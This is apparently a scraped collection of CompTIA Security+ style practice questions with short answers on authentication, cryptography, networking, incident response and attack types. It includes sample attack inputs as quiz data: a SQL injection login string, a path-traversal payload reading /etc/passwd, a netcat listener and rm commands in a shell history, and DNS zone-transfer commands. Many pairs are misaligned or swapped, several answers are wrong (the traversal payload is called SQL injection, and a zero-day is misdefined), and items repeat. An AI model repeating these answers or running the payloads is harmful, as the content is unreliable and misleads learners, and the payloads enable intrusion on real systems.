The help desk is receiving numerous password change alerts from users in the accounting department. These alerts occur multiple times on the same day for each of the affected users' accounts. Which of the following controls should be implemented to curtail this activity?

Password minimum age

To get the most accurate results on the security posture of a system, which of the following actions should the analyst do prior to scanning?

Patch the scanner

A security analyst has been asked to perform a review of an organization's software development lifecycle. The analyst reports that the lifecycle does not contain a phase in which team members evaluate and provide critical feedback of another developer's code. Which of the following assessment technique is BEST described in the analyst's report?

Peer review

After a user reports slow computer performance, a system administrator detects a suspicious file, which was installed as part of a freeware software package. The system administrator reviews the output below: (Foreign Address not listed; State not listed) Based on the information, which of the following types of malware was installed on the user's computer?

RAT

A systems administrator has isolated an infected system from the network and terminated the malicious process from executing. Which of the following should the administrator do NEXT according to the incident response process?

Restore loss from data backup

A systems administrator has isolated an infected system from the network and terminated the malicious process from executing. Which of the following should the administrator do NEXT according to the incident response process?

Restore lost data from a backup

A copy of a highly confidential salary report has recently found on a printer in the IT department. The human resources department does not have this specific printer mapped to its devices, and it is suspected that an employee in the IT department browsed to the share where the report was located and printed it without authorization. Which of the following technical controls would be the BEST choice to immediately prevent this from happening again?

Restrict access to the share where the report resides to only human resources employees and enable auditing

A company is deploying smartphones for its mobile salesforce. These devices are for personal and business user but are owned by the company. Sales personnel will save new customer data via a custom application developed for the company. This application will integrate with the contact information stored in the smartphones and will populate new customer records onto it. The customer application's data is encrypted at rest, and the application's connection to the back office system is considered secure. The Chief Information Security Officer (CISO) has concerns that customer contact information may be accidentally leaked due to the limited security capabilities of devices and the planned controls. Which of the following will be the MOST efficient security control to implement to lower this risk?

Restrict contact information storage dataflow so it is only shared with the customer application

Alissa manages network security at her company. She's had several calls from users stating that their personal data is being stolen when they use the wireless network. Several of them have insisted they only connect to the corporate wireless access point (WAP), but logs for the WAP show the users have never connected to it. Which of the following explains this situation?

Rogue Access Point

While working through a malware outbreak, you discover something very odd on your company network. There's a file that has the same name as a Windows system DLL file and has the same API interface but handles the input very differently. It also looks like applications have been attaching to this file rather than the real system DLL. What best describes this?

Shimming

Frank is concerned that confidential documents, with proprietary information, may be leaked. The leaks could either be intentional or accidental, but he is looking for a solution that would embed some identifying information into documents in a way that it would not be seen by the reader but could be extracted with the right software. What technology would best meet these needs?

Steganography

An organization's employees currently use three different sets of credentials to access multiple internal resources. Management wants to make this process less complex. Which of the following would be the BEST option to meet this goal?

Single sign-on

An organization's employees currently use three different sets of credentials to access multiple internal resources. Management wants to make this process less complex. Which of the following would be the BEST option to meet this goal?

Single sign-on

Which of the following technologies employ the use of SAML? (Select two)

Single sign-on Federation

A law office has been leasing dark fiber from a local telecommunications company to connect a remote office to company headquarters. The telecommunications company has decided to discontinue its dark fiber product and is offering an MPLS connection, which the law office feels is too expensive. Which of the following is the BEST solution for the law office?

Site-to-site VPN

Walter is working to implement Type II authentication. Which would be the best example of type II authentication

Smart Cards

A security administrator wants to implement strong security on the company's smartphones and terminal servers located in the data center. Drag and drop the applicable controls to each asset type.

Smart Phone: screen lock, strong password, device encryption, remote wipe, GPS tracking, pop-up blocker. Terminal Server: cable locks, antivirus, host based firewall, proximity reader, mantrap

Users in a corporation currently authenticate with a username and password. A security administrator wishes to implement two-factor authentication to improve security. Which of the following authentication methods should be deployed to achieve this goal?

Smart card

Of the listed items, which is not a step of the incident response process?

Snapshot

As the manager for network operations at his company, Shane saw an accountant in the hall who thanks him for keeping the antivirus software up to date. When asked what he means, he mentions one of the IT staff members named Michael called him yesterday and remotely connected to his PC to update the antivirus...but there's no employee named Michael. What happened?

Social Engineering

Phishing emails frequently take advantage of high-profile catastrophes reported in the news. Which of the following principles does BEST describe the weakness being exploited?

Social proof

Which of the following types of firewalls will examine the context of each packet it encounters?

Stateful packet filtering firewall

A security technician would like to obscure sensitive data within a file so that it can be transferred without causing suspicion. Which of the following technologies would BEST be suited to accomplish this?

Steganography

A website administrator has received an alert from an application designed to check the integrity of the company's website. The alert indicated that the hash value for a particular MPEG file has changed. Upon further investigation, the media appears to be the same as it was before the alert. Which of the following methods has MOST likely been used?

Steganography

The company you work for is considering moving its email server to a hosting company. This will help reduce the cost of hardware and server administration at your local site. Which document formally states the reliability and recourse if reliability isn't met?

SLA (Service Level Agreement)

Confidential emails from an organization were posted to a website without the organization's knowledge. Upon investigation, it was determined that the emails were obtained from an internal actor who sniffed the emails in plain text. Which of the following protocols, if properly implemented, would have MOST likely prevented the emails from being sniffed? (Select two)

SMTPS S/MIME

A security consultant discovers that an organization is using the PCL protocol to print documents, utilizing the default driver and print settings. Which of the following is the MOST likely risk in this situation?

SNMP data leaving the printer will not be properly encrypted

An organization's primary data center is experiencing a two-day outage due to an HVAC malfunction. The node located in the data center has lost power and is no longer operational, impacting the ability of all users to connect to the alternate datacenter. Which of the following BIA concepts BEST represents the risk described in this scenario?

SPoF

Lisa manages incident response for a bank. The bank has a website that's been attacked. The attacker utilized the login screen, and rather than entering proper login credentials, the attacker entered some odd text: ' or '1'='1. What is this attack known as?

SQL Injection

A security analyst receives an alert from a WAF with the following payload: var data = "<test test test> ++ <../../../../../../etc/passwd>" Which of the following types of attacks is this?

SQL injection (uses malicious code to manipulate your database into revealing information. Mitigating this attack vector is both easy and vital for keeping your information safe.)

Which of the following should be used to implement voice encryption?

SRTP

A customer calls a technician and needs to remotely connect to a web server to change some code manually. The technician needs to configure the user's machine with protocols to connect to the Unix web server, which is behind a firewall. Which of the following protocols does the technician MOST likely need to configure?

SSH

Of the following choices, which item best shows the state of a computer at the time it was collected by law enforcement?

Screenshots

Kevin manages security for a large university and has just successfully performed a threat analysis for the network. Based on past incidents and studies from similar setups, he has determined that the most prevalent threat is low-skilled attackers who wish to breach the system, simply because they can, for some low-level crime, or even changing a grade. Which term describes this attacker?

Script Kiddie

A consumer purchases an exploit from the dark web. The exploit targets the online shopping cart of a popular website, allowing the shopper to modify the price of an item as checkout. Which of the following BEST describes this type of user?

Script kiddie

An actor downloads and runs a program against a corporate login page. The program imports a list of usernames and passwords, looking for a successful attempt. Which of the following terms BEST describes the actor in this situation?

Script kiddie

An actor downloads and runs a programs program against a corporate login page. The program imports a list of username and password, looking for successful attempt. Which of the following terms best describes the actor in this situation?

Script kiddie

During a third-party audit, it is determined that a member of the firewall team can request, approve, and implement a new rule-set on the firewall. Which of the following will the audit team most likely recommend during the audit out brief?

Separation of duties policy for the firewall team

Although a web enabled application appears to only allow letters in the comment field of a web form, malicious user was able to carry a SQL injection attack by sending special characters through the web comment field. Which of the following has the application programmer failed to implement?

Server-side validation

Audit logs from a small company's vulnerability scanning software show the following findings: "Server101-internet-facing web serverServer101- vulnerable to buffer overflow exploit that may allow attackers to install software" Assuming external attackers who are gaining unauthorized information are of the highest concern, which of the following servers should be addressed FIRST?

Server101

Company A agrees to provide perimeter protection, power, and environmental support with measurable goals for Company B, but will not be responsible for user authentication or patching of operating systems within the perimeter. Which of the following is being described?

Service Level Agreement

A systems administrator is attempting to recover from a catastrophic failure in the datacenter. To recover the domain controller, the systems administrator needs to provide the domain administrator credentials. Which of the following account types is the systems administrator using?

Service account

A small company's Chief Executive Officer (CEO) has asked its Chief Security Officer (CSO) to improve the company's security posture quickly with regards to targeted attacks. Which of the following should the CSO conduct FIRST?

Survey threat feeds from services inside the same industry?

A security analyst is working on a project that requires the implementation of a stream cipher. Which of the following should the analyst use?

Symmetric algorithm

Two users must encrypt and transmit large amount of data between them. Which of the following should they use to encrypt and transmit the data?

Symmetric algorithm

Two users must encrypt and transmit large amounts of data between them. Which of the following should they use to encrypt and transmit the data?

Symmetric algorithm

Two users must encrypt and transmit large amounts of data between them. Which of the following should they use to encrypt and transmit the data?

Symmetric algorithm

A security analyst is reviewing patches on servers. One of the servers is reporting the following error message in the WSUS management console: The computer has not reported status in 30 days. Given this scenario, which of the following statements BEST represents the issue with the output above?

The computer in question has not pulled the latest application software updates.

A technician receives a device with the following anomalies: Based on the above output, which of the following should be reviewed?

The file integrity check

A security administrator has found a has in the environment known to belong to malware. The administrator then finds this file to be in the pre-update area of the OS, which indicates it was pushed from the central patch system. (First hash is 01, second hash is 99) Given the about outputs, which of the following is MOST likely happened?

The file was infected when the patch manager downloaded it

A security administrator is configuring a new network segment, which contains devices that will be accessed by external users, such as web and FTP server. Which of the following represents the MOST secure way to configure the new network segment?

The segment should be placed on an extranet, and the firewall rules should be configured to allow both internal and external traffic.

Of the following, which provides the best examples of the drawback of symmetric key systems?

The key must be delivered in a secure manner

Eddie is your security manager and he received a call from law enforcement telling him that some of his computers on his network participated in a massive DoS attack. He's certain that none of his employees would be involved in a cybercrime. What best explains the given scenario?

The machines are bots

Due to regulatory requirements, server in a global organization must use time synchronization. Which of the following represents the MOST secure method of time synchronization?

The server should connect to internal Stratum 0 NTP servers for synchronization

A malicious system continuously sends an extremely large number of SYN packets to a server. Which of the following BEST describes the resulting effect?

The server will exhaust its memory maintaining half-open connections

A malicious system continuously sends an extremely large number of SYN packets to a server. Which of the following BEST describes the resulting effect?

The server will exhaust its memory maintaining half-open connections

In your company, there are some computers on your network that still use Windows XP. They have to stay at XP and cannot be upgraded due to application specifications. The application doesn't run on newer operating systems. What security issue does this pose?

The machines cannot be patched as XP is no longer supported

In determining when it may be necessary to perform a credentialed scan against a system instead of a non-credentialed scan, which of the following requirements is MOST likely to influence this decision?

The scanner must be able to audit file system permissions

Change antenna placement. Adjust power level controls

The security administrator has noticed cars parking just outside of the building fence line. Which of the following security measures can the administrator use to help protect the company's WiFi network against war driving? (Select TWO)

You're currently looking for a network authentication method that uses digital certificates and doesn't require users to remember passwords. Which method is the most beneficial?

Tokens

A security analyst is acquiring data from a potential network incident. Which of the following evidence is the analyst MOST likely to obtain to determine the incident?

Traffic and logs

A security analyst is acquiring data from a potential network incident. Which of the following evidence is the analyst MOST likely to obtain to determine the incident?

Traffic and logs

Walt, a sales manager at your company, has been complaining about his computer performing slowly. When you investigate the issue, you noticed some spyware on his computer, but he insists the only thing he has downloaded lately was a freeware stock trading application. What best explains this situation?

Trojan Horse

One of the following items automatically updates browsers with a list of root certificates from an online web source used to track which certificates can be trusted, which one is it?

Trust Model

User from two organizations, each with its own PKI, need to begin working together on a joint project. Which of the following would allow the users of the separate PKIs to work together without connection errors?

Trust model

User from two organizations, each with its own PKI, need to begin working together on a joint project. Which of the following would allow the users of the separate PKIs to work together without connection errors?

Trust model

Jonathan works for a large bank and one of his responsibilities is to ensure that web bank logins are as secure as possible. He's concerned that a customer's account login could be compromised and someone else would gain access to that customer's account. What is the best way to mitigate this threat?

Use SMS authentication for any logins from an unknown computer or location

A security analyst is testing both Windows and Linux systems for unauthorized DNS zone transfers within a LAN on comptia.org from example.org. Which of the following commands should the security analyst use? (Select two)

(1) dig - axfr comptia.org @example.org (2) nslookup comptia.org set type=ANY ls-d example.org

An auditor is reviewing the following output from a password-cracking tool: user1: Password1 user2: Recovery! user3: Alaskan10 user4: 4Private user5: PerForMance2 Which of the following methods did the auditor MOST likely use? A. Hybrid B. Dictionary C. Brute force D. Rainbow table

A

In terms of encrypting data, which of the following is BEST described as a way to safeguard password data by adding random data to it in storage? A. Using salt B. Using hash algorithms C. Implementing elliptical curve D. Implementing PKI

A

Malicious traffic from an internal network has been detected on an on authorized port on an application server. Which of the following network-based security control should the engineer consider implementing A ACLs B HIPS C Nat D Mac filtering

A

Which of the following differentiates a collision attack from a rainbow table attack?

A rainbow table attack performs a hash lookup.

You are a security analyst and you have just successfully removed malware from a virtual server. Which could you use to return the virtual server to its last known good state?

A Snapshot

To determine the ALE of a particular risk, which of the following must be caculated?

ARO SLE

A threat actor has created a tool which creates a man-in-the-middle attack. The actor is using this tool to capture encrypted communication between two remote users. The actor was unable to decrypt the messages he captured though. Why was the threat actor unable to decrypt the messages he captured as part of his man-in-the-middle attack?

Asymmetric Encryption

The administrator installs database software to encrypt each field as it is written to a disk. Which of the following describes the encrypted data?

At-rest

Malia has noticed some steganography tools on an employee's computer. What is the greatest concern regarding an employee having steganography tools?

Data Exfiltration

A network technician is trying to determine the source of an ongoing network based attack. Which of the following should the technician use to view IPv4 packet data on a particular internal network segment? A. Proxy B. Protocol analyzer C. Switch D. Firewall

B

A security administrator is trying to encrypt communication. For which of the following reasons should administrator take advantage of the Subject Alternative Name (SAM) attribute of a certificate? A. It can protect multiple domains B. It provides extended site validation C. It does not require a trusted certificate authority D. It protects unlimited subdomains

B

A security guard has informed the Chief Information Security Officer that a person with a tablet has been walking around the building. The guard also noticed strange white markings in different areas of the parking lot. The person is attempting which of the following types of attacks? A. Jamming B. War chalking C. Packet sniffing D. Near field communication

B

An organization is comparing and contrasting migration from its standard desktop configuration to the newest version of the platform. Before this can happen, the Chief Information Security Officer (CISO) voices the need to evaluate the functionality of the newer desktop platform to ensure interoperability with existing software in use by the organization. In which of the following principles of architecture and design is the CISO engaging? A Dynamic analysis B Change management C Baselining D Waterfalling

B

During a recent audit, it was discovered that many services and desktops were missing security patches. Which of the following BEST describes the assessment that was performed to discover this issue? A. Network mapping B. Vulnerability scan C. Port Scan D. Protocol analysis

B

When connected to a secure WAP, which of the following encryption technologies is MOST likely to be configured when connecting to WPA2-PSK? A. DES B. AES C. MD5 D. WEP

B

Which of the following types of keys is found in a key escrow? A Public B Private C Shared D Session

B

Jeremy is concerned about employees violating software licenses. What would be the first step to address this issue?

Establishing clear policies

Choose the appropriate attack that sends two different messages using the same hash function, therefore, causing a collision

Birthday

A security administrator must implement a system to ensure that invalid certificates are not used by a custom developed application. The system must be able to check the validity of certificates even when internet access is unavailable. Which of the following MUST be implemented to support this requirement? A. CSR B. OCSP C. CRL D. SSH

C

After correctly configuring a new wireless enabled thermostat to control the temperature of the company's meeting room, Joe, a network administrator determines that the thermostat is not connecting to the internet-based control system. Joe verifies that the thermostat received the expected network parameters and it is associated with the AP. Additionally, the other wireless mobile devices connected to the same wireless network are functioning properly. The network administrator verified that the thermostat works when tested at his residence. Which of the following is the MOST likely reason the thermostat is not connecting to the internet? A. The company implements a captive portal B. The thermostat is using the incorrect encryptioin algorithm C. The WPA2 shared key is incorrect D. The company's DHCP server scope is full

C

An attack that is using interference as its main attack to impede network traffic is which of the following? A. Introducing too much data to a server targets memory allocation B. Utilizing a previously unknown security flaw against the target C. Using a similar wireless configuration of a nearby network D. Inundating a target system with SYN requests

C

An attacker captures the encrypted communication between two parties for a week, but is unable to decrypt the messages. The attacker then compromises the session key during one exchange and successfully compromises a single message. The attacker plans to use this key to decrypt previously captured and future communications, but is unable to. This is because the encryption scheme in use adheres to: A. Asymmetric encryption B. Out-of-band key exchange C. Perfect forward secrecy D. Secure key escrow

C

The chief security officer has reported a rise in data loss but no break-ins have occurred. By doing which of the following is the CSO most likely to reduce the number of incidents? A. Implement protected distribution B. Empty additional firewall C. Conduct security awareness training D. Install perimeter barricades

C

Which of the following is the LEAST secure hashing algorithm? A. SHA1 B. RIPEMD C. MD5 D. DES

C

Which of the following best describes the initial processing phase used in mobile device forensics? A. The phone should be powered down in the battery removed to preserve the state of data on any internal or removable storage utilized by the mobile device B. The removable data storage card should be processed first to prevent data alteration when examining the mobile device C. The mobile device should be examined first, then removable storage and lastly the phone without removable storage should be examined again D. The phone and storage card should be examined as a complete unit after examining the removable storage cards separately

D

Which of the following attacks specifically impacts data availability?

DDoS

Which of the following types of EAP use an operation that consists of three phases?

EAP-FAST

Which of the following requires both server and client certificates?

EAP-TLS

Which cryptography option uses points on a curve to define public and private key pairs?

ECC (Elliptic Curve Cryptography)

What type of attack uses a second WAP with the same SSID as a legitimate AP in an attempt to get user information via connecting to the hackers WAP?

Evil Twin

You have been presented with the task of implementing a solution that ensures data stored on a removable USB drive hasn't been tampered with or changed. Which should be implemented?

File Hashing

Which of the following are MOST susceptible to birthday attack?

Hashed passwords

Of the following, which is the most fundamental BIOS integrity technique?

Managing BIOS passwords

Which method below was used as a native default for older versions of Microsoft Windows?

NTLM (New Technology Lan Manager)

Which of the following types of keys is found in a key escrow?

Private

A recent internal audit is forcing a company to review each internal business unit's VMs because the cluster they are installed on is in danger of running out of computer resources. Which of the following vulnerabilities exist?

System sprawl

A recent internal audit is forcing a company to review each internal business unit's VMs because the cluster they are installed on is in danger of running out of computer resources. Which of the following vulnerabilities exist?

System sprawl

Josh is thinking of using voice recognition as part of his access control strategy. Choose one weakness with voice recognition.

Systems require training

A security administrator is trying to encrypt communication. For which of the following reasons should the administrator take advantage of the Subject Alternative Name (SAM) attribute of a certificate?

T provides extended site validation

Joe, a security administrator, needs to extend the organization's remote access functionality to be used by staff while traveling. Joe needs to maintain separate access control functionalities for internal, external, and VOIP services. Which of the following represents the BEST access technology for Joe to use?

TACACS+

Which of the following can be used to control specific commands that can be executed on a network infrastructure device?

TACACS+

An organization is expanding its network team. Currently, it has local accounts on all network devices, but with growth, it wants to move to centrally managed authentication. Which of the following are the BEST solutions for the organization? (Sect TWO)

TACACS+ and RADIUS

A director of IR is reviewing a report regarding several recent breaches. The director compiles the following statistics Initial IR engagement time frameLength of time before an executive management notice went outAverage ir phase completion The director wants to use the data to shorten the response time. Which of the following would accomplish this?

Tabletop exercise

Systems administrator and key support staff come together to simulate a hypothetical interruption of service. The team updates the disaster recovery processes and documentation after meeting. Which of the following describes the team's efforts?

Tabletop exercise

Systems administrator and key support staff come together to simulate a hypothetical interruption of service. The team updates disaster recovery processes and documentation after meeting. Which of the following describes the team's efforts?

Tabletop exercise

A security team wants to establish an Incident Response plan. The team has never experienced an incident. Which of the following would BEST help them establish plans and procedures?

Tabletop exercises

A security auditor is testing perimeter security in a building that is protected by badge readers. Which of the following types of attacks would MOST likely gain access?

Tailgating

Which of the following is the GREATEST risk to a company by allowing employees to physically bring their personal smartphones to work?

Taking pictures of proprietary information and equipment in restricted areas

Jeff is the network administrator and sometimes needs to run a packet sniffer so he can view the network traffic. He would like to find a well-known packet sniffer that works on Linux. Which of the following is the best choice?

Tcpdump

Chris is responsible for application development at his company. He believes all web applications need to be tested prior to being deployed live. He wants to use a test system that matches his live system. What is this called?

Test Server

Which of the following can be provided to a AAA system for the identification phase?

Username

An IV attack can be associated with which of the following?

WEP

An active/passive configuration has an impact on:

availability

As part of the new BYOD rollout, a security analyst has been asked to find a way to securely store company data on personal devices. Which of the following would BEST help to accomplish this?

implement containerization of company data

Which is the best choice for naming the account of John Smith - domain admin?

jsmith

An auditor wants to test the security posture of an organization by running a tool that will display the following: JIMS <00> UNIQUE Registered WORKGROUP <00> GROUP Registered JIMS <00> UNIQUE Registered Which of the following commands should be used?

nbtstat

A cybersecurity analyst is looking into the payload of a random packet capture file that was selected for analysis. The analyst notices that an internal host had a socket established with another internal host over a non-standard port. Upon investigation, the origin host that initiated the socket shows this output: usera@host>history mkdir /local/usr/bin/somedirectory nc -1 192.168.5.1 -p 9856 ping -c 30 8.8.8.8 -a 600 rm /etc/dir2/somefile rm -rm /etc/dir2/ traceroute 8.8.8.8 pakill pid 9487 usera@host> Given the above output, which of the following commands would have established the questionable socket?

nc -1 192.168.5.1 -p 9856

A procedure differs from a policy in that it:

provides step-by-step instructions for performing a task.

You currently work for a large company and are concerned about ensuring all workstations have a common configuration, do not contain a rogue software installation, and all patches are kept up to date. Of the following, which would be most effective to accomplish this?

Use VDE

As part of the new industry regulation, companies are required to utilize secure, standardized OS settings. A technical must ensure the OS settings are hardened. Which of the following is the BEST way to do this?

Use a configuration compliance scanner

A penetration testing is preparing for a client engagement in which the tester must provide data that proves and validates the scanning tool's results. Which of the following is the best method for collecting this information?

Use a protocol analyzer to log all pertinent network traffic

An organization identifies a number of hosts making outbound connections to a known malicious IP over port TCP 80. The organization wants to identify the data being transmitted and prevent future connections to this IP. Which of the following should the organization do to achieve this outcome?

Use a protocol analyzer to reconstruct the data and blacklist the IP on the firewall.

The chief security officer (CSO) has issued a new policy that requires that all internal websites be configured for HTTPS traffic only. The network administrator has been tasked to update all internal sites without incurring additional costs. Which of the following is the best solution for the network administrator to secure each internal website?

Use certificates signed by the company CA

A security guard has informed the Chief Information Security Officer that a person with a tablet has been walking around the building. The guard also noticed strange white markings in different areas of the parking lot. The person is attempting which of the following types of attacks?

Warchalking

When attackers use a compromised host as a platform for launching attacks deeper into a company's network, it is said that they are:

pivoting

A web server, which is configured to use TLS with AES-GCM-256, SHA-384, and ECDSA, recently suffered an information loss breach. Which of the following is MOST likely the cause?

poor implementation

You have been tasked with designing a security plan for your company. Drag and drop the appropriate security controls on the floor plan.

unsupervised lab: cable locks office: proximity badge, safe data center: CCTV proximity badge, man trap, locking cabinets, biometric reader employee laptop: biometric reader

Of the listed principles, which is not a physical security control?

Antivirus software

Which plan identifies critical systems and components to ensure assets are safe and protected?

BCP (Business Continuity Plan)

Task: Configure the firewall (fill out the table)

... [IP addresses???]

A security analyst is implementing PKI-based functionality to a web application that has the following requirements: file contains certificate information; certificate chains; root authority certificates; private key. All of these components will be part of one file and cryptographically protected with a password. Given this scenario, which of the following certificate types should the analyst implement to BEST meet these requirements?

.pfx certificate

Pat is working to allocate appropriate numbers of IP addresses for various subnets in the network for his company. What would be the proper CIDR notation for an IP v4 subnet with 72 nodes?

/24

A security auditor is reviewing the following output from file integrity monitoring software installed on a very busy server at a large service provider. The server has not been updated since it was installed. Drag and drop the log entry that identifies the first instance of server compromise.

1/1/2017 3:30:00 7813a82384cbaeb45bd12943a9234df3

A security administrator is creating a subnet on one of the corporate firewall interfaces to use as a DMZ which is expected to accommodate at most 14 physical hosts. Which of the following subnets would BEST meet the requirement?

192.168.0.16/28

A penetration tester is conducting an assessment on Comptia.org and run the following command from a coffee shop while connected to the public internet: c:\nslookup -querytype=MX comptia.org Which of the following should the penetration tester conclude about the command output?

192.168.102.67 is a backup mail server that may be more vulnerable to attack

A penetration tester is conducting an assessment on Comptia.org and runs the following command from a coffee shop while connected to the public Internet: c:\nslookup-querytype=MX comptia.org Server: Unknown Address: 198.51.100.45 comptia.org MX prefer ence=10, mail exchanger = 92.68.102.33 comptia.org MX preference=20, mail exchanger = exchg1.comptia.org exchg1.comptia.org internet address= 192.168.102.67 Which of the following should the penetration tester conclude about the command output?

192.168.102.67 is a backup mail server that may be more vulnerable to attack.

A database backup schedule consists of weekly full backups performed on Saturday at 12:00 a.m. and daily differential backups also performed at 12:00 a.m. If the database is restored on Tuesday afternoon, which of the following is the number of individual backups that would need to be applied to complete the database recovery?

2

Of the items listed, which provides additional encryption strength by repeating the encryption process with additional keys?

3DES

A technician must configure a firewall to block external DNS traffic from entering a network. Which of the following ports should they block on the firewall?

53

Kristi is setting up database servers on their own subnet. She has placed them on 10.10.3.3/29. How many nodes can be allocated in this subnet?

6

Caleb is running a port scan on a network to meet some requirements of a security audit. He has noticed that domain controller is using secured LDAP. Which port would lead him to that conclusion?

636

George is a security officer for a bank. When an executive has a laptop decommissioned, he wants to be sure that all of the data is completely wiped and unrecoverable, even via forensic tools. How many times should the hard drive be wiped?

7

Of the following standards, which one support WPA2 but not WEP or WPA?

802.11i

A security analyst is hardening a large-scale wireless network. The primary requirements are the following: Given these requirements, which of the following should the analyst implement and recommend? (Select two)

802.1X WPA2-PSK

A wireless network uses a RADIUS server that is connected to an authenticator, which in turn connects to a supplicant. Which of the following represents the authentication architecture in use?

802.1x

Of the listed principles, which could be found in a DRP (Disaster Recovery Plan)?

Prioritized list of critical systems

A network administrator at a small office wants to simplify the configuration to mobile clients connecting to an encrypted wireless network. Which of the following should be implemented in the administrator does not want to provide wireless password or he certificate to the employees? A. WPS B. 800 2.1 X C. WPA2-psk D. tkip

A

A penetration testing is preparing for a client engagement in which the tester must provide data that proves and validates the scanning tools' results. Which of the following is the best method for collecting this information? A. Set up the scanning system's firewall to permit and log all outbound connections B. Use a protocol analyzer to log all pertinent network traffic C. Configure network flow data logging on all scanning system D. Enable debug level logging on the scanning system and all scanning tools used

A

A security administrator needs to implement a system that detects possible intrusions based upon a vendor provided list. Which of the following BEST describes this type of IDS? A. Signature based B. Heuristic C. Anomaly based D. Behavior based

A

A security team wants to establish an incident response plan. The team has never experienced an incident. Which of the following would best help them establish plans and procedures A. Table top exercises B Lessons Learned C escalation procedures D recovery procedures

A

Which of the following is commonly used for federated identity managment across multiple organizations? A. SAML B. Active Directory C. Kerberos D. LDAP

A

Which of the following is the proper way to quantify the total monetary damage resulting from from an exploited vulnerability? A. Calculate the ALE B. Calculate the ARO C. Calculate the MTBF D. Calculate the TCO

A

Which of the following must be intact for evidence to be admissible in court? A. Chain of custody B. Order of volatility C. legal hold D. Reservation

A

Put the VoIP network into a different VLAN than the existing data network.

A company is deploying a new VoIP phone system. They require 99.999% uptime for their phone service and are concerned about their existing data network interfering with the VoIP phone system. The core switches in the existing data network are almost fully saturated. Which of the following options will pro-vide the best performance and availability for both the VoIP traffic, as well as the traffic on the existing data network?

Of the listed items, which can be considered as a single point of failure?

A configuration

A security analyst is attempting to break into a client's secure network. The analyst was not given prior information about the client, except for a block of public IP addresses that are currently in use. After network enumeration, the analyst's NEXT step is to perform:

A gray-box penetration test

A security analyst is attempting to break into a client's secure network . The analyst was not given prior information about the client, except for a block of public IP addresses that are currently in use. After network enumeration, the analyst's NEXT step is to perform :

A gray-box penetration test.

A CSIRT has completed restoration procedures related to a breach of sensitive data is creating documentation used to improve the organization's security posture. The team has been specifically tasked to address logical controls in their suggestions. Which of the following would be MOST beneficial to include in lessons learned documentation? (Select two)

A list of policies, which should be revised to provide better clarity to employees regarding acceptable use A list of topics that should be added to the organization's security awareness training program based on weaknesses exploited during the attack

An employee uses RDP to connect back to the office network. If RDP is misconfigured, which of the following security exposures would this lead to?

A man in the middle attack could occur, resulting in the employee's username and password being captured

Josh manages security at a power plant. The facility is sensitive, and security is very important. He would like to incorporate two-factor authentications with physical security. Which of the options below is the best way to meet this requirement?

A mantrap with a smart card at one door and a pin keypad at the other door.

WPS

A network administrator at a small office wants to simplify the configuration of mobile clients connecting to an encrypted wireless network. Which of the following should be implemented in the administrator does not want to provide the wireless password or he certificate to the employees?

The firewall should be configured to prevent user traffic form matching the implicit deny rule.

A new firewall has been places into service at an organization. However, a configuration has not been entered on the firewall. Employees on the network segment covered by the new firewall report they are unable to access the network. Which of the following steps should be completed to BEST resolve the issue?

The file was embedded with a logic bomb to evade detection.

A security administrator has found a hash in the environment known to belong to malware. The administrator then finds this file to be in in the preupdate area of the OS, which indicates it was pushed from the central patch system. File: winx86_adobe_flash_upgrade.exe Hash: 99ac28bede43ab869b853ba62c4ea243 The administrator pulls a report from the patch management system with the following output: Given the above outputs, which of the following MOST likely happened?

Which of the following differentiates a collision attack from a rainbow table attack?

A rainbow table attack performs a hash lookup

Enable group policy based screensaver timeouts

A security administrator has been tasked with improving the overall security posture related to desktop machines on the network. An auditor has recently that several machines with confidential customer information displayed in the screens are left unattended during the course of the day. Which of the following could the security administrator implement to reduce the risk associated with the finding?

Which of the following are used to substantially increase the computation time required to crack a password? (Select two)

BCRYPT PBKDF2

Continuous monitoring

A security administrator returning from a short vacation receives an account lock-out message when attempting to log into the computer. After getting the account unlocked the security administrator immediately notices a large amount of emails alerts pertaining to several different user accounts being locked out during the past three days. The security administrator uses system logs to determine that the lock-outs were due to a brute force attack on all accounts that has been previously logged into that machine. Which of the following can be implemented to reduce the likelihood of this attack going undetected?

Implement account lockout settings

A security analyst is investigating a suspected security breach and discovers the following in the logs of the potentially compromised server: Which of the following would be the BEST method for preventing this type of suspected attack in the future?

PGP

A system administrator wants to implement an internal communication system that will allow employees to send encrypted messages to each other. The system must also support non- repudiation. Which of the following implements all these requirements?

Service account

A systems administrator is attempting to recover from a catastrophic failure in the datacenter. To recover the domain controller, the systems administrator needs to provide the domain administrator credentials. Which of the following account types is the systems administrator using?

Which should be required by a company to mitigate the impact of a custom piece of software being installed by a vendor in case the vendor later goes out of business?

A third party source code escrow

Hardware OTP token

A user is presented with the following items during the new-hire onboarding process: -Laptop -Secure USB drive -Hardware OTP token -External high-capacity HDD -Password complexity policy -Acceptable use policy -HASP key -Cable lock Which of the following is one component of multifactor authentication?

Which of the following scenarios BEST describes an implementation of non-repudiation?

A user sends a digitally signed email to the entire finance department about an upcoming meeting

Of the following, which describes a zero-day vulnerability?

A vulnerability that has been known to the vendor for zero days

A security administrator is developing controls for creating audit trails and tracking if a PHI data breach is to occur. The administrator has been given the following requirements: *All access must be correlated to a user account. *All user accounts must be assigned to a single individual. *User access to the PHI data must be recorded. *Anomalies in PHI data access must be reported. *Logs and records cannot be deleted or modified. Which of the following should the administrator implement to meet the above requirements? (Select THREE). A. Eliminate shared accounts. B. Create a standard naming convention for accounts. C. Implement usage auditing and review. D. Enable account lockout thresholds. E. Copy logs in real time to a secured WORM drive. F. Implement time-of-day restrictions. G. Perform regular permission audits and reviews..

A. Eliminate shared accounts C. Implement usage auditing and review E. Copy logs in real time to secured WORM drive

Carolyn is the network administrator for a small financial services company and is responsible for controlling access to the resources on her network. Which technology is responsible for blocking access to a resource based on the requesting IP address?

ACL (Access Control List)

Randi is concerned about unauthorized users connecting to company routers and she wants to prevent spoofing. What is the most essential antispoofing technique for routers?

ACL (Access Control List)

Malicious traffic from an internal network has been detected on an unauthorized port on an application server. Which of the following network-based security controls should the engineer consider implementing?

ACLs

A security administrator has been asked to implement a VPN that will support remote access over IPSEC. Which of the following is an encryption algorithm that would meet this requirement?

AES

When connected to a secure WAP, which of the following encryption technologies is MOST likely to be configured when connecting to WPA2-PSK?

AES

Which of the following encryption algorithms is used primarily to secure data at rest?

AES

Of the following, which is a symmetric encryption algorithm that works with 128/192/256bit key versions?

AES (Advanced Encryption Standard)

A Security Officer on a military base needs to encrypt several phones that will be going into the field. Which of the following encryption solutions should be deployed in this situation?

AES-256

Which of the following is a summary of the loss for a given year?

ALE

A security analyst is performing a quantitative risk analysis. The risk analysis should show the potential monetary loss each time a threat or event occurs. Given this requirement, which of the following concepts would assist the analyst in determining this value? (Select two)

